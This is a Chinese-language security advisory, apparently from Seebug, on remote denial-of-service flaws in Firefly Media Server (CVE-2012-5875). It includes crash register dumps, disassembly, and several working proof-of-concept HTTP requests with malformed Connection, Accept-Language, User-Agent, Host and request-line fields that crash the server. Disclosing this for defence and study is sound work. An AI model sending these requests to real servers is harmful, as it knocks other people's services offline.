Firefly Media Server firefly.exe畸形HTTP请求远程拒绝服务漏洞

2012-12-21T00:00:00
ID SSV:60523
Type seebug
Reporter Root
Modified 2012-12-21T00:00:00

Description

BUGTRAQ ID: 56999 CVE(CAN) ID: CVE-2012-5875

Firefly Media Server是开源的音频媒体服务器。

Firefly Media Server 1.0.0.1359及其他版本存在多个空指针引用漏洞,恶意用户可利用这些漏洞造成远程服务器崩溃。

1)"firefly.exe"文件内的HTTP CONNECTION标头没有正确处理,通过发送特制的报文到9999/TCP端口,可导致空指针引用,造成受影响服务器立即崩溃。

崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> n 0n-us,en;q=0.5U) (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack) ESI: 0175eef5 ( 24506101) -> 0n-us,en;q=0.5U) (stack) EBP: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap) ESP: 0175eed0 ( 24506064) -> u0p xxxxxxx_xxxx_n 0n-us,en;q=0.5U) (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> uw0</er<uuu\w@wu)|</er<uu|0|Aw<pv@vpx@ (stack) +0c: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A

反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl

PoC GET / HTTP/1.1 Host: vulnhost.local User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: xxxxxxx_xxxx_ Referer: http://www.host.com

2)"firefly.exe"文件内的ACCEPT-LANGUAGE, USER-AGENT和HOST HTTP标头参数没有正确处理,通过向9999/TCP端口发送特制的报文,可造成空指针引用,导致拒绝服务。

a) ACCEPT-LANGUAGE 崩溃细节:

EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> nguage /5.0 (Windows; U) (stack) EDI: 0175eee8 ( 24506088) -> (stack) ESI: 0175eefa ( 24506106) -> /5.0 (Windows; U) (stack) EBP: 00708830 ( 7374896) -> p3xxpppHFF (heap) ESP: 0175eed0 ( 24506064) -> u0pguage /5.0 (Windows; U) (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> uw0</er<uuu\w@wu)|</er<uu|0|Aw<pv@vp x (stack) +0c: 00708830 ( 7374896) -> p3xxpppHFF (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A

反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl

POC

GET / HTTP/1.1 Host: somehost.com User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us en;q=0.5 \r\n Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com

b) USER-AGENT

崩溃细节 EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> t t (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx(stack) ESI: 0175eef5 ( 24506101) -> t (stack) EBP: 007087d8 ( 7374808) -> p>ppPp<p (heap) ESP: 0175eed0 ( 24506064) -> upxxxxxxxt t (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 007087d8 ( 7374808) -> p>ppPp<p (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A

反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl

PoC:

GET / HTTP/1.1 Host: somehost.com User-Agent: xxxxxxx \r\n Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com

c) HOST

崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 0175eeef ( 24506095) -> (stack) EBP: 00708830 ( 7374896) -> p!ppp\pHFF"& (heap) ESP: 0175eed0 ( 24506064) -> u0pxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 00708830 ( 7374896) -> p!ppp\pHFF"& (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A

反汇编:

0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl

PoC:

GET / HTTP/1.1 Host: xxxxxxx\r\n User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com

3)"firefly.exe"文件内的HTTP POST和GET方法没有正确处理,通过向9999/TCP端口发送特制报文,可导致空指针引用,造成服务器崩溃。

a) HTTP POST 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 00000001 ( 1) -> N/A EBP: 007087d8 ( 7374808) -> ppPpatp (heap) ESP: 0175eed0 ( 24506064) -> upxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 007087d8 ( 7374808) -> ppPpatp (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,b

PoC:

POST /index.html HTTP/ xxxxxxxx .1

b) HTTP GET 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 00000001 ( 1) -> N/A EBP: 00708830 ( 7374896) -> p!pppHFF#) (heap) ESP: 0175eed0 ( 24506064) -> u0pxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 00708830 ( 7374896) -> p!pppHFF#) (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl

PoC:

GET /index.html HTTP/xxxxxxxx.1 Proof of concept #2: The following HTTP request will crash the vulnerable Firefly server remotely: GET /index.html HTTP/ xxxxxxxx.1 0 Firefly Media Server 厂商补丁:

fireflymediaserver

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.fireflymediaserver.org/